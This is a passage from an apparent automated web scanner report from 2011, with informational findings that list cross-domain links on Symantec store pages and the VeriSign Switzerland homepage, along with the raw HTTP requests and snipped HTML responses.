<a href="http://www.pctools.com/file-recover/" title="File Recovery">File Recovery</a>
...[SNIP]...
<li>
<a href="http://www.pctools.com/spyware-doctor/" title="Spyware Doctor">Spyware Doctor</a>
...[SNIP]...
<li>
<a href="http://www.pctools.com/privacy-guardian/" title="Privacy Guardian">Privacy Guardian</a>
...[SNIP]...
<li>
<a href="http://free.pctools.com/free-antivirus/" title="Free Antivirus">Free Antivirus</a>
...[SNIP]...
<li>
<a href="http://www.pctools.com/password-manager/" title="Password Manager">Password Manager</a>
...[SNIP]...
<li>
<a href="http://www.pctools.com/registry-mechanic/" title="Registry Mechanic">Registry Mechanic</a>
...[SNIP]...

14.61. http://www.symantec.com/store/products/index.jsp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.symantec.com
Path:	/store/products/index.jsp

Issue detail

The page was loaded from a URL containing a query string:

http://www.symantec.com/store/products/index.jsp?inid=us_pagenotfound_smb_store

The response contains the following links to other domains:

http://buy.norton.com/estore/mf/landingProductFeatures?sfid=0DkpLFXQ3kCwDtN5LGxP0QYnM2M1k82n0GYrZ6wYNQkcsXHnc441!2017174390!1267046176849
http://free.pctools.com/free-antivirus/
http://us.norton.com/
http://us.norton.com/antivirus/
http://us.norton.com/ghost/
http://us.norton.com/internet-security/
http://us.norton.com/nortonlive/free-pc-checkup.jsp
http://us.norton.com/nortonlive/spyware-virus-removal.jsp
http://us.norton.com/security_response/malware.jsp
http://us.norton.com/security_response/phishing.jsp
http://us.norton.com/security_response/spyware.jsp
http://www.backup.com/
http://www.pctools.com/file-recover/
http://www.pctools.com/password-manager/
http://www.pctools.com/performance-toolkit/
http://www.pctools.com/privacy-guardian/
http://www.pctools.com/registry-mechanic/
http://www.pctools.com/simple-backup/
http://www.pctools.com/spyware-doctor-antivirus/
http://www.pctools.com/spyware-doctor/
http://www.verisign.com/authentication/pki-infrastructure-solutions/index.html
http://www.verisign.com/authentication/pki-infrastructure-solutions/managed-pki/index.html
http://www.verisign.com/authentication/two-factor-authentication/index.html
http://www.verisign.com/authentication/two-factor-authentication/vip-authentication/index.html
http://www.verisign.com/code-signing/index.html
http://www.verisign.com/ssl/index.html
http://www.verisign.com/ssl/ssl-information-center/extended-validation-ssl-certificates/index.html
http://www.verisign.com/ssl/ssl-information-center/index.html
http://www.verisign.com/trust-seal/index.html
http://www.verisign.com/trust-seal/resources/malware-faq/index.html

Request

GET /store/products/index.jsp?inid=us_pagenotfound_smb_store HTTP/1.1
Host: www.symantec.com
Proxy-Connection: keep-alive
Referer: http://www.symantec.com/business/verisign/fraud-detection-service?tid=gnps
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2735422985161DC5-600001A3801B01DD[CE]; s_pers=%20s_nr%3D1315621879623-New%7C1336357879623%3B%20event69%3Devent69%7C1336357879625%3B; s_sess=%20s_sv_sid%3D806960442771%3B%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_sv_112_s1=1@16@a//1315621570007; s_sv_112_p1=1@25@s/6036/5742/5736/5417&e/5

Response

HTTP/1.1 200 OK
Server: Sun-Java-System-Web-Server/7.0
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Content-Length: 28649
Cache-Control: public, max-age=3523
Date: Fri, 09 Sep 2011 21:31:11 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<title>Store Shop Products - Symantec Corp.</title>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8"/>
<
...[SNIP]...
<div style="float:right; text-align:right; padding-top:10px;">

Business Store  |  <a href="http://buy.norton.com/estore/mf/landingProductFeatures?sfid=0DkpLFXQ3kCwDtN5LGxP0QYnM2M1k82n0GYrZ6wYNQkcsXHnc441!2017174390!1267046176849">Norton Store</a>
...[SNIP]...
<li>
<a href="http://us.norton.com/antivirus/" title="AntiVirus">AntiVirus</a>
...[SNIP]...
<li>
<a href="http://us.norton.com/ghost/" title="Backup Software">Backup Software</a>
...[SNIP]...
<li>
<a href="http://us.norton.com/internet-security/" title="Internet Security">Internet Security</a>
...[SNIP]...
<li>
<a href="http://us.norton.com/security_response/malware.jsp" title="Malware">Malware</a>
...[SNIP]...
<li>
<a href="http://www.backup.com/" title="Online Backup">Online Backup</a>
...[SNIP]...
<li>
<a href="http://us.norton.com/security_response/phishing.jsp" title="Phishing">Phishing</a>
...[SNIP]...
<li>
<a href="http://us.norton.com/security_response/spyware.jsp" title="Spyware">Spyware</a>
...[SNIP]...
<li>
<a href="http://us.norton.com/" title="Virus Protection">Virus Protection</a>
...[SNIP]...
<li>
<a href="http://us.norton.com/nortonlive/spyware-virus-removal.jsp" title="Virus Removal">Virus Removal</a>
...[SNIP]...
<li>
<a href="http://us.norton.com/nortonlive/free-pc-checkup.jsp" title="Virus Scan">Virus Scan</a>
...[SNIP]...
<li>
<a href="http://www.verisign.com/ssl/ssl-information-center/index.html" title="SSL">SSL</a>
...[SNIP]...
<li>
<a href="http://www.verisign.com/ssl/index.html" title="SSL Certificates">SSL Certificates</a>
...[SNIP]...
<li>
<a href="http://www.verisign.com/ssl/ssl-information-center/extended-validation-ssl-certificates/index.html" title="Extended Validation">Extended Validation</a>
...[SNIP]...
<li>
<a href="http://www.verisign.com/trust-seal/index.html" title="VeriSign Trust Seal">VeriSign Trust Seal</a>
...[SNIP]...
<li>
<a href="http://www.verisign.com/authentication/two-factor-authentication/index.html" title="Two-Factor Authentication">Two-Factor Authentication</a>
...[SNIP]...
<li>
<a href="http://www.verisign.com/authentication/two-factor-authentication/vip-authentication/index.html" title="Identity Protection">Identity Protection</a>
...[SNIP]...
<li>
<a href="http://www.verisign.com/trust-seal/resources/malware-faq/index.html" title="Malware Scan">Malware Scan</a>
...[SNIP]...
<li>
<a href="http://www.verisign.com/code-signing/index.html" title="Code Signing">Code Signing</a>
...[SNIP]...
<li>
<a href="http://www.verisign.com/authentication/pki-infrastructure-solutions/index.html" title="Public Key Infrastructure">Public Key Infrastructure</a>
...[SNIP]...
<li>
<a href="http://www.verisign.com/authentication/pki-infrastructure-solutions/managed-pki/index.html" title="PKI">PKI</a>
...[SNIP]...
<li>
<a href="http://www.pctools.com/spyware-doctor-antivirus/" title="Spyware Doctor with Antivirus">Spyware Doctor with Antivirus</a>
...[SNIP]...
<li>
<a href="http://www.pctools.com/performance-toolkit/" title="Performance Toolkit">Performance Toolkit</a>
...[SNIP]...
<li>
<a href="http://www.pctools.com/simple-backup/" title="Simple Backup">Simple Backup</a>
...[SNIP]...
<li>
<a href="http://www.pctools.com/file-recover/" title="File Recovery">File Recovery</a>
...[SNIP]...
<li>
<a href="http://www.pctools.com/spyware-doctor/" title="Spyware Doctor">Spyware Doctor</a>
...[SNIP]...
<li>
<a href="http://www.pctools.com/privacy-guardian/" title="Privacy Guardian">Privacy Guardian</a>
...[SNIP]...
<li>
<a href="http://free.pctools.com/free-antivirus/" title="Free Antivirus">Free Antivirus</a>
...[SNIP]...
<li>
<a href="http://www.pctools.com/password-manager/" title="Password Manager">Password Manager</a>
...[SNIP]...
<li>
<a href="http://www.pctools.com/registry-mechanic/" title="Registry Mechanic">Registry Mechanic</a>
...[SNIP]...

14.62. http://www.symantec.com/store/resources/index.jsp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.symantec.com
Path:	/store/resources/index.jsp

Issue detail

The page was loaded from a URL containing a query string:

http://www.symantec.com/store/resources/index.jsp?inid=us_pagenotfound_smb_store

The response contains the following links to other domains:

http://free.pctools.com/free-antivirus/
http://us.norton.com/
http://us.norton.com/antivirus/
http://us.norton.com/ghost/
http://us.norton.com/internet-security/
http://us.norton.com/nortonlive/free-pc-checkup.jsp
http://us.norton.com/nortonlive/spyware-virus-removal.jsp
http://us.norton.com/security_response/malware.jsp
http://us.norton.com/security_response/phishing.jsp
http://us.norton.com/security_response/spyware.jsp
http://www.backup.com/
http://www.pctools.com/file-recover/
http://www.pctools.com/password-manager/
http://www.pctools.com/performance-toolkit/
http://www.pctools.com/privacy-guardian/
http://www.pctools.com/registry-mechanic/
http://www.pctools.com/simple-backup/
http://www.pctools.com/spyware-doctor-antivirus/
http://www.pctools.com/spyware-doctor/
http://www.verisign.com/authentication/pki-infrastructure-solutions/index.html
http://www.verisign.com/authentication/pki-infrastructure-solutions/managed-pki/index.html
http://www.verisign.com/authentication/two-factor-authentication/index.html
http://www.verisign.com/authentication/two-factor-authentication/vip-authentication/index.html
http://www.verisign.com/code-signing/index.html
http://www.verisign.com/ssl/index.html
http://www.verisign.com/ssl/ssl-information-center/extended-validation-ssl-certificates/index.html
http://www.verisign.com/ssl/ssl-information-center/index.html
http://www.verisign.com/trust-seal/index.html
http://www.verisign.com/trust-seal/resources/malware-faq/index.html

Request

GET /store/resources/index.jsp?inid=us_pagenotfound_smb_store HTTP/1.1
Host: www.symantec.com
Proxy-Connection: keep-alive
Referer: http://www.symantec.com/business/verisign/fraud-detection-service?tid=gnps
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2735422985161DC5-600001A3801B01DD[CE]; s_pers=%20s_nr%3D1315621879623-New%7C1336357879623%3B%20event69%3Devent69%7C1336357879625%3B; s_sess=%20s_sv_sid%3D806960442771%3B%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_sv_112_s1=1@16@a//1315621570007; s_sv_112_p1=1@25@s/6036/5742/5736/5417&e/5

Response

HTTP/1.1 200 OK
Server: Sun-Java-System-Web-Server/7.0
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Content-Length: 27682
Cache-Control: public, max-age=3600
Date: Fri, 09 Sep 2011 21:31:12 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<title>Store Shopping Resources - Symantec Corp.</title>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8
...[SNIP]...
<li>
<a href="http://us.norton.com/antivirus/" title="AntiVirus">AntiVirus</a>
...[SNIP]...
<li>
<a href="http://us.norton.com/ghost/" title="Backup Software">Backup Software</a>
...[SNIP]...
<li>
<a href="http://us.norton.com/internet-security/" title="Internet Security">Internet Security</a>
...[SNIP]...
<li>
<a href="http://us.norton.com/security_response/malware.jsp" title="Malware">Malware</a>
...[SNIP]...
<li>
<a href="http://www.backup.com/" title="Online Backup">Online Backup</a>
...[SNIP]...
<li>
<a href="http://us.norton.com/security_response/phishing.jsp" title="Phishing">Phishing</a>
...[SNIP]...
<li>
<a href="http://us.norton.com/security_response/spyware.jsp" title="Spyware">Spyware</a>
...[SNIP]...
<li>
<a href="http://us.norton.com/" title="Virus Protection">Virus Protection</a>
...[SNIP]...
<li>
<a href="http://us.norton.com/nortonlive/spyware-virus-removal.jsp" title="Virus Removal">Virus Removal</a>
...[SNIP]...
<li>
<a href="http://us.norton.com/nortonlive/free-pc-checkup.jsp" title="Virus Scan">Virus Scan</a>
...[SNIP]...
<li>
<a href="http://www.verisign.com/ssl/ssl-information-center/index.html" title="SSL">SSL</a>
...[SNIP]...
<li>
<a href="http://www.verisign.com/ssl/index.html" title="SSL Certificates">SSL Certificates</a>
...[SNIP]...
<li>
<a href="http://www.verisign.com/ssl/ssl-information-center/extended-validation-ssl-certificates/index.html" title="Extended Validation">Extended Validation</a>
...[SNIP]...
<li>
<a href="http://www.verisign.com/trust-seal/index.html" title="VeriSign Trust Seal">VeriSign Trust Seal</a>
...[SNIP]...
<li>
<a href="http://www.verisign.com/authentication/two-factor-authentication/index.html" title="Two-Factor Authentication">Two-Factor Authentication</a>
...[SNIP]...
<li>
<a href="http://www.verisign.com/authentication/two-factor-authentication/vip-authentication/index.html" title="Identity Protection">Identity Protection</a>
...[SNIP]...
<li>
<a href="http://www.verisign.com/trust-seal/resources/malware-faq/index.html" title="Malware Scan">Malware Scan</a>
...[SNIP]...
<li>
<a href="http://www.verisign.com/code-signing/index.html" title="Code Signing">Code Signing</a>
...[SNIP]...
<li>
<a href="http://www.verisign.com/authentication/pki-infrastructure-solutions/index.html" title="Public Key Infrastructure">Public Key Infrastructure</a>
...[SNIP]...
<li>
<a href="http://www.verisign.com/authentication/pki-infrastructure-solutions/managed-pki/index.html" title="PKI">PKI</a>
...[SNIP]...
<li>
<a href="http://www.pctools.com/spyware-doctor-antivirus/" title="Spyware Doctor with Antivirus">Spyware Doctor with Antivirus</a>
...[SNIP]...
<li>
<a href="http://www.pctools.com/performance-toolkit/" title="Performance Toolkit">Performance Toolkit</a>
...[SNIP]...
<li>
<a href="http://www.pctools.com/simple-backup/" title="Simple Backup">Simple Backup</a>
...[SNIP]...
<li>
<a href="http://www.pctools.com/file-recover/" title="File Recovery">File Recovery</a>
...[SNIP]...
<li>
<a href="http://www.pctools.com/spyware-doctor/" title="Spyware Doctor">Spyware Doctor</a>
...[SNIP]...
<li>
<a href="http://www.pctools.com/privacy-guardian/" title="Privacy Guardian">Privacy Guardian</a>
...[SNIP]...
<li>
<a href="http://free.pctools.com/free-antivirus/" title="Free Antivirus">Free Antivirus</a>
...[SNIP]...
<li>
<a href="http://www.pctools.com/password-manager/" title="Password Manager">Password Manager</a>
...[SNIP]...
<li>
<a href="http://www.pctools.com/registry-mechanic/" title="Registry Mechanic">Registry Mechanic</a>
...[SNIP]...

14.63. http://www.symantec.com/store/services/index.jsp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.symantec.com
Path:	/store/services/index.jsp

Issue detail

The page was loaded from a URL containing a query string:

http://www.symantec.com/store/services/index.jsp?inid=us_pagenotfound_smb_store

The response contains the following links to other domains:

http://free.pctools.com/free-antivirus/
http://us.norton.com/
http://us.norton.com/antivirus/
http://us.norton.com/ghost/
http://us.norton.com/internet-security/
http://us.norton.com/nortonlive/free-pc-checkup.jsp
http://us.norton.com/nortonlive/spyware-virus-removal.jsp
http://us.norton.com/security_response/malware.jsp
http://us.norton.com/security_response/phishing.jsp
http://us.norton.com/security_response/spyware.jsp
http://www.backup.com/
http://www.pctools.com/file-recover/
http://www.pctools.com/password-manager/
http://www.pctools.com/performance-toolkit/
http://www.pctools.com/privacy-guardian/
http://www.pctools.com/registry-mechanic/
http://www.pctools.com/simple-backup/
http://www.pctools.com/spyware-doctor-antivirus/
http://www.pctools.com/spyware-doctor/
http://www.verisign.com/authentication/pki-infrastructure-solutions/index.html
http://www.verisign.com/authentication/pki-infrastructure-solutions/managed-pki/index.html
http://www.verisign.com/authentication/two-factor-authentication/index.html
http://www.verisign.com/authentication/two-factor-authentication/vip-authentication/index.html
http://www.verisign.com/code-signing/index.html
http://www.verisign.com/ssl/index.html
http://www.verisign.com/ssl/ssl-information-center/extended-validation-ssl-certificates/index.html
http://www.verisign.com/ssl/ssl-information-center/index.html
http://www.verisign.com/trust-seal/index.html
http://www.verisign.com/trust-seal/resources/malware-faq/index.html

Request

GET /store/services/index.jsp?inid=us_pagenotfound_smb_store HTTP/1.1
Host: www.symantec.com
Proxy-Connection: keep-alive
Referer: http://www.symantec.com/business/verisign/fraud-detection-service?tid=gnps
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2735422985161DC5-600001A3801B01DD[CE]; s_pers=%20s_nr%3D1315621879623-New%7C1336357879623%3B%20event69%3Devent69%7C1336357879625%3B; s_sess=%20s_sv_sid%3D806960442771%3B%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_sv_112_s1=1@16@a//1315621570007; s_sv_112_p1=1@25@s/6036/5742/5736/5417&e/5

Response

HTTP/1.1 200 OK
Server: Sun-Java-System-Web-Server/7.0
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Content-Length: 25519
Cache-Control: public, max-age=3530
Date: Fri, 09 Sep 2011 21:31:13 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<title>Store Services - Symantec Corp.</title>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8"/>
<meta
...[SNIP]...
<li>
<a href="http://us.norton.com/antivirus/" title="AntiVirus">AntiVirus</a>
...[SNIP]...
<li>
<a href="http://us.norton.com/ghost/" title="Backup Software">Backup Software</a>
...[SNIP]...
<li>
<a href="http://us.norton.com/internet-security/" title="Internet Security">Internet Security</a>
...[SNIP]...
<li>
<a href="http://us.norton.com/security_response/malware.jsp" title="Malware">Malware</a>
...[SNIP]...
<li>
<a href="http://www.backup.com/" title="Online Backup">Online Backup</a>
...[SNIP]...
<li>
<a href="http://us.norton.com/security_response/phishing.jsp" title="Phishing">Phishing</a>
...[SNIP]...
<li>
<a href="http://us.norton.com/security_response/spyware.jsp" title="Spyware">Spyware</a>
...[SNIP]...
<li>
<a href="http://us.norton.com/" title="Virus Protection">Virus Protection</a>
...[SNIP]...
<li>
<a href="http://us.norton.com/nortonlive/spyware-virus-removal.jsp" title="Virus Removal">Virus Removal</a>
...[SNIP]...
<li>
<a href="http://us.norton.com/nortonlive/free-pc-checkup.jsp" title="Virus Scan">Virus Scan</a>
...[SNIP]...
<li>
<a href="http://www.verisign.com/ssl/ssl-information-center/index.html" title="SSL">SSL</a>
...[SNIP]...
<li>
<a href="http://www.verisign.com/ssl/index.html" title="SSL Certificates">SSL Certificates</a>
...[SNIP]...
<li>
<a href="http://www.verisign.com/ssl/ssl-information-center/extended-validation-ssl-certificates/index.html" title="Extended Validation">Extended Validation</a>
...[SNIP]...
<li>
<a href="http://www.verisign.com/trust-seal/index.html" title="VeriSign Trust Seal">VeriSign Trust Seal</a>
...[SNIP]...
<li>
<a href="http://www.verisign.com/authentication/two-factor-authentication/index.html" title="Two-Factor Authentication">Two-Factor Authentication</a>
...[SNIP]...
<li>
<a href="http://www.verisign.com/authentication/two-factor-authentication/vip-authentication/index.html" title="Identity Protection">Identity Protection</a>
...[SNIP]...
<li>
<a href="http://www.verisign.com/trust-seal/resources/malware-faq/index.html" title="Malware Scan">Malware Scan</a>
...[SNIP]...
<li>
<a href="http://www.verisign.com/code-signing/index.html" title="Code Signing">Code Signing</a>
...[SNIP]...
<li>
<a href="http://www.verisign.com/authentication/pki-infrastructure-solutions/index.html" title="Public Key Infrastructure">Public Key Infrastructure</a>
...[SNIP]...
<li>
<a href="http://www.verisign.com/authentication/pki-infrastructure-solutions/managed-pki/index.html" title="PKI">PKI</a>
...[SNIP]...
<li>
<a href="http://www.pctools.com/spyware-doctor-antivirus/" title="Spyware Doctor with Antivirus">Spyware Doctor with Antivirus</a>
...[SNIP]...
<li>
<a href="http://www.pctools.com/performance-toolkit/" title="Performance Toolkit">Performance Toolkit</a>
...[SNIP]...
<li>
<a href="http://www.pctools.com/simple-backup/" title="Simple Backup">Simple Backup</a>
...[SNIP]...
<li>
<a href="http://www.pctools.com/file-recover/" title="File Recovery">File Recovery</a>
...[SNIP]...
<li>
<a href="http://www.pctools.com/spyware-doctor/" title="Spyware Doctor">Spyware Doctor</a>
...[SNIP]...
<li>
<a href="http://www.pctools.com/privacy-guardian/" title="Privacy Guardian">Privacy Guardian</a>
...[SNIP]...
<li>
<a href="http://free.pctools.com/free-antivirus/" title="Free Antivirus">Free Antivirus</a>
...[SNIP]...
<li>
<a href="http://www.pctools.com/password-manager/" title="Password Manager">Password Manager</a>
...[SNIP]...
<li>
<a href="http://www.pctools.com/registry-mechanic/" title="Registry Mechanic">Registry Mechanic</a>
...[SNIP]...

14.64. http://www.verisign.ch/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.verisign.ch
Path:	/

Issue detail

The page was loaded from a URL containing a query string:

http://www.verisign.ch/?tid=header-logo

The response contains the following links to other domains:

http://blogs.verisign.com/?tid=footer
http://cdn.verisign.com/assets/shared/css/header.css
http://cdn.verisign.com/authweb/en_ch/assets/header/images/en_ch_partners-featured-ssl-promo.jpg
http://cdn.verisign.com/authweb/en_ch/assets/header/images/en_ch_ps-freetrial-promo.jpg
http://cdn.verisign.com/authweb/en_ch/assets/header/images/en_ch_support-promo.jpg
http://cdn.verisign.com/authweb/en_ch/assets/header/images/en_ch_symc-auth_logo.png
http://cdn.verisign.com/authweb/en_ch/assets/home/css/en_ch_home.css
http://cdn.verisign.com/authweb/en_ch/assets/home/images/verisign_inc_promo_home.png
http://cdn.verisign.com/authweb/en_ch/assets/shared/js/google-analytics.js
http://cdn.verisign.com/authweb/global/assets/home/css/home.css
http://cdn.verisign.com/authweb/global/assets/home/js/home.js?071211
http://cdn.verisign.com/authweb/global/assets/shared/css/shared.css
http://cdn.verisign.com/authweb/global/assets/shared/images/favicon.ico
http://cdn.verisign.com/authweb/global/assets/shared/images/hp-promo-fingerprint.png
http://cdn.verisign.com/authweb/global/assets/shared/images/shoppingcart.png
http://cdn.verisign.com/authweb/global/assets/shared/js/global-preload.js
http://cdn.verisign.com/authweb/global/assets/shared/js/jquery.hover_intent.js
http://cdn.verisign.com/authweb/global/assets/shared/js/rotator.js
http://cdn.verisign.com/authweb/global/assets/shared/js/shared.js?082911
http://ch.norton.com/
http://smallbusiness.norton.com/
http://verisign.com/partnersupport/worldwide/partnersupport.html
http://www.pctools.com/de/
http://www.symantec.com/
http://www.symantec.com/de/ch/about/news/release/index.jsp
http://www.verisign.co.jp/
http://www.verisign.co.nz/
http://www.verisign.co.uk/
http://www.verisign.co.uk/authentication/consumer-authentication/identity-protection/index.html
http://www.verisign.co.uk/authentication/consumer-authentication/two-factor-authentication/index.html
http://www.verisign.co.uk/authentication/consumer-authentication/two-factor-authentication/index.html?tid=gnps
http://www.verisign.co.uk/authentication/consumer-authentication/vip-fraud-detection-services/index.html?tid=gn-i_need_to
http://www.verisign.co.uk/authentication/enterprise-authentication/managed-pki/index.html
http://www.verisign.co.uk/authentication/enterprise-authentication/pki-infrastructure-solutions/index.html?tid=gnps
http://www.verisign.co.uk/authentication/individual-authentication/digital-id/?tid=gnps
http://www.verisign.com.au/
http://www.verisign.com.br/
http://www.verisign.com.hk/
http://www.verisign.com.sg/
http://www.verisign.com.tw/
http://www.verisign.com/
http://www.verisign.com/ar/
http://www.verisign.com/ca/
http://www.verisign.com/cl/
http://www.verisign.com/latinamerica/esp/
http://www.verisign.com/mx/
http://www.verisign.com/nl/
http://www.verisign.com/partners/ssl-reseller-programs/featured-ssl-partners/index.html?tid=gnpartners-promo
http://www.verisign.com/verisign-worldwide/index.html?tid=footer
http://www.verisignchina.com.cn/
https://cc-admin.geotrust.com/geocenter/reseller/logon.do
https://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab
https://knowledge.verisign.ch/support/code-signing-support/index.html?tid=gnpsupport
https://knowledge.verisign.ch/support/digital-id-support/index.html?tid=gnsupport
https://knowledge.verisign.ch/support/mpki-support/index.html?tid=gnsupport
https://knowledge.verisign.ch/support/ssl-certificates-support/index.html?tid=gnpsupport
https://knowledge.verisign.ch/support/ssl-certificates-support/index.html?tid=gnpsupport-promo
https://knowledge.verisign.ch/support/trust-seal-support/index.html?tid=gnpsupport
https://products.verisign.com/geocenter/reseller/logon.do
https://seal.verisign.com/getseal?at=1&sealid=2&dn=www.verisign.ch&lang=en
https://seal.verisign.com/getseal?host_name=www.verisign.ch&size=S&use_flash=YES&use_transparent=YES&lang=en
https://ssl-certificate-center.verisign.ch/process/retail/console_login?application_locale=VRSN_CH
https://ssl-certificate-center.verisign.ch/process/retail/production_trial_initial?productType=HASGCServer&application_locale=VRSN_CH
https://trust-center.verisign.ch/process/retail/console_login?application_locale=VRSN_CH
https://trust-center.verisign.com/process/retail/trust_initial?application_locale=VRSN_CH

Request

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:26:10 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
X-UA-Compatible: IE=EmulateIE7
Content-Type: text/html
Content-Length: 31344

<!DOCTYPE html>
<html lang="">
   <head>
       <title>VeriSign Authentication Services - The leading Provider of SSL. Products include SSL, SSL Certificates, Extended Validation (EV SSL), VeriSign Trust Sea
...[SNIP]...
<meta http-equiv="X-UA-Compatible" content="IE=7" />
       <link rel="shortcut icon" href="http://cdn.verisign.com/authweb/global/assets/shared/images/favicon.ico" type="image/x-icon" />


       <script type="text/javascript">
...[SNIP]...
</script>

       <script type="text/javascript" src="http://cdn.verisign.com/authweb/global/assets/shared/js/global-preload.js"></script>
       <link href="http://cdn.verisign.com/authweb/global/assets/shared/css/shared.css" rel="stylesheet" />

       


       <link href="http://cdn.verisign.com/authweb/global/assets/home/css/home.css" rel="stylesheet" />

       
       <link rel='stylesheet' href='http://cdn.verisign.com/authweb/en_ch/assets/home/css/en_ch_home.css' />
   </head>
...[SNIP]...

       <link href="http://cdn.verisign.com/assets/shared/css/header.css" rel="stylesheet" />
       <!--[if lte IE 7]>
...[SNIP]...
<a href="/?tid=header-logo" title="Now from Symantec - VeriSign Authentication Services"><img src="http://cdn.verisign.com/authweb/en_ch/assets/header/images/en_ch_symc-auth_logo.png" /></a>
...[SNIP]...
<li><a href='//www.verisign.com/ar/'>Argentina</a>
...[SNIP]...
<li><a href='//www.verisign.com.au/'>Australia</a>
...[SNIP]...
<li><a href='//www.verisign.com.br/'>Brazil</a>
...[SNIP]...
<li><a href='//www.verisign.com/ca/'>Canada</a>
...[SNIP]...
<li><a href='//www.verisign.com/cl/'>Chile</a>
...[SNIP]...
<li><a href='//www.verisignchina.com.cn/'>China</a>
...[SNIP]...
<li><a href='//www.verisign.com.hk/'>Hong Kong</a>
...[SNIP]...
<li><a href='//www.verisign.co.jp/'>Japan</a>
...[SNIP]...
<li><a href='//www.verisign.com/latinamerica/esp/'>Latin America</a>
...[SNIP]...
<li><a href='//www.verisign.com/mx/'>Mexico</a>
...[SNIP]...
<li><a href='//www.verisign.com/nl/'>Netherlands</a>
...[SNIP]...
<li><a href='//www.verisign.co.nz/'>New Zealand</a>
...[SNIP]...
<li><a href='//www.verisign.com.sg/'>Singapore</a>
...[SNIP]...
<li><a href='//www.verisign.com.tw/'>Taiwan</a>
...[SNIP]...
<li><a href='//www.verisign.com/'>United States</a>
...[SNIP]...
<li><a href='//www.verisign.co.uk/'>United Kingdom</a>
...[SNIP]...
<div id="header_seal">
                       <script type="text/javascript" src="https://seal.verisign.com/getseal?host_name=www.verisign.ch&size=S&use_flash=YES&use_transparent=YES&lang=en"></script>
                       <noscript>
                           <object classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" codebase="https://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=5,0,0,0" id="s_s" align="" height="72" width="100">
                               <param name="movie" value="https://seal.verisign.com/getseal?at=1&sealid=2&dn=www.verisign.ch&lang=en">
...[SNIP]...
<param name="allowScriptAccess" value="always">
                               <embed src="https://seal.verisign.com/getseal?at=1&sealid=2&dn=www.verisign.ch&lang=en" loop="false" menu="false" quality="best" wmode="transparent" swliveconnect="FALSE" name="s_s" type="application/x-shockwave-flash" pluginspage="https://www.macromedia.com/go/getflashplayer" allowscriptaccess="always" align="" height="72" width="100"/>
                           </object>
...[SNIP]...
<li><a href='//www.verisign.co.uk/authentication/consumer-authentication/two-factor-authentication/index.html?tid=gnps'>Two-Factor Authentication</a>
...[SNIP]...
<li><a href='//www.verisign.co.uk/authentication/enterprise-authentication/pki-infrastructure-solutions/index.html?tid=gnps'>Public Key Infrastructure (PKI) Services</a>
...[SNIP]...
<li><a href='//www.verisign.co.uk/authentication/individual-authentication/digital-id/?tid=gnps'>Digital IDs for Secure Email</a>
...[SNIP]...
<li><a href='//www.verisign.co.uk/authentication/consumer-authentication/vip-fraud-detection-services/index.html?tid=gn-i_need_to'>Detect Fraud Online</a>
...[SNIP]...
<a href="/ssl/free-trial/index.html?tid=gnps-promo" class="promo-link"><img src="http://cdn.verisign.com/authweb/en_ch/assets/header/images/en_ch_ps-freetrial-promo.jpg" alt="Try VeriSign SSL or VeriSign Trust Seal - FREE!" width="170" height="183" /></a>
...[SNIP]...
<p class="small"><a rel="external" href="//verisign.com/partnersupport/worldwide/partnersupport.html">Email support for login help.</a>
...[SNIP]...
</div>
   <a href="//www.verisign.com/partners/ssl-reseller-programs/featured-ssl-partners/index.html?tid=gnpartners-promo" class="promo-link"><img src="http://cdn.verisign.com/authweb/en_ch/assets/header/images/en_ch_partners-featured-ssl-promo.jpg" alt="See all Featured SSL Partners" width="170" height="231" /></a>
...[SNIP]...
<li><a href='https://knowledge.verisign.ch/support/ssl-certificates-support/index.html?tid=gnpsupport'>SSL Certificates Support</a>
...[SNIP]...
<li><a href='https://knowledge.verisign.ch/support/trust-seal-support/index.html?tid=gnpsupport'>VeriSign Trust™ Seal Support</a>
...[SNIP]...
<li><a href='https://knowledge.verisign.ch/support/code-signing-support/index.html?tid=gnpsupport'>Code Signing Support</a>
...[SNIP]...
<li><a href='https://knowledge.verisign.ch/support/digital-id-support/index.html?tid=gnsupport'>Digital IDs for Secure Email Support</a>
